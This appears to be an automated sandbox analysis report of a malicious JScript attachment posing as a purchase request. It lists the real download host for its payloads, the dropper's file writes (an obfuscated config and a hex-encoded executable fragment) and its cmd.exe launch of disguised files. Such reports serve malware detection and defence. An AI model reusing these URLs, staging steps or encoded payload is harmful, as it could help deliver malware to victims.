Click to jump to signature section
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg# | Avira URL Cloud: Label: malware |
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8 | Avira URL Cloud: Label: malware |
Source: https://www2.0zz0.com/2025/01/31/04/672996792.jpg | Avira URL Cloud: Label: malware |
Source: https://www2.0zz0.com/2025/01/31/04/195774460.jpg | Avira URL Cloud: Label: malware |
Source: RFQ-PR 1-62557 & 38929 III.js | Virustotal: Detection: 13% | Perma Link |
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: Joe Sandbox View | IP Address: 104.21.112.1 104.21.112.1 |
Source: Joe Sandbox View | IP Address: 104.21.112.1 104.21.112.1 |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic | HTTP traffic detected: GET /2025/01/31/04/672996792.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /2025/01/31/04/195774460.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | HTTP traffic detected: GET /2025/01/31/04/672996792.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /2025/01/31/04/195774460.jpg HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www2.0zz0.comConnection: Keep-Alive |
Source: global traffic | DNS traffic detected: DNS query: www2.0zz0.com |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Feb 2025 19:32:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM5bIw4WfFci4WiSx5X2u%2BIfVaJIb5bcnXMCqjheCwy96VHQRlaqfwyDtj3lqdZGgglnCJW%2BstpIwMg02uAxgwL3ZKTElE%2BqGcOSLo2H36SJq1CAhSdMScLF2nCXlu4D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=15552000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 911f7c0389bc43b3-EWR |
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing |
Source: wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/ |
Source: wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/1957 |
Source: wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp, RFQ-PR 1-62557 & 38929 III.js | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg |
Source: wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg# |
Source: wscript.exe, 00000000.00000003.2024121506.000001981832E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8 |
Source: wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/195774460.jpgk |
Source: wscript.exe, 00000000.00000003.2086953526.00000198187B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053256942.0000019819005000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088150100.0000019818AB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085334086.0000019816521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2088888179.0000019816522000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086579467.00000198183A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085295307.000001981901C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2022748516.00000198185AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2022946684.00000198187B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2089308318.0000019818F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2089402259.000001981901C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085277039.0000019816515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086752965.00000198185AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp, RFQ-PR 1-62557 & 38929 III.js | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpg |
Source: wscript.exe, 00000000.00000003.2024195004.00000198182BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025131758.00000198182F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpg48578894 |
Source: wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/2025/01/31/04/672996792.jpge |
Source: wscript.exe, 00000000.00000002.2089113128.00000198182E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088035837.00000198182E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/2Z% |
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/? |
Source: wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www2.0zz0.com/O |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704 |
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49704 version: TLS 1.2 |
Source: RFQ-PR 1-62557 & 38929 III.js | Initial file: wscript.shell, adodb.stream, responsebody, cmd.exe |
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} | Jump to behavior |
Source: RFQ-PR 1-62557 & 38929 III.js | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal88.evad.winJS@4/4@1/1 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\195774460[1].jpg | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\aqgeukibkal | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: RFQ-PR 1-62557 & 38929 III.js | Virustotal: Detection: 13% |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-PR 1-62557 & 38929 III.js" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3"" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ""C:\Users\user\AppData\Local\Temp\aqgeukibkal\shuv.xls" "C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3"" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "ingobxndsgvxkm.bls");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "tbcj.onj");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\tbcj.onj", "true");ITextStream.Write("0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]80/]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]FC29_7*4_848D9F7_848D9F7_848D9F70C");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem3.BuildPath("Unsupported parameter type 00000009", "aqgeukibkal");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\Temp\aqgeukibkal");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp\aqgeukibkal", "ingobxndsgvxkm.bls");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls", "true");ITextStream.Write("[S3tt!ng]H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738KeIsX=winxewDir3ctory=dxadRP=tbcj.onjsK=281sN=jogg.xdfinclud3r=fcwwefq.ipeAuEx=gnldmm");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFileSystem |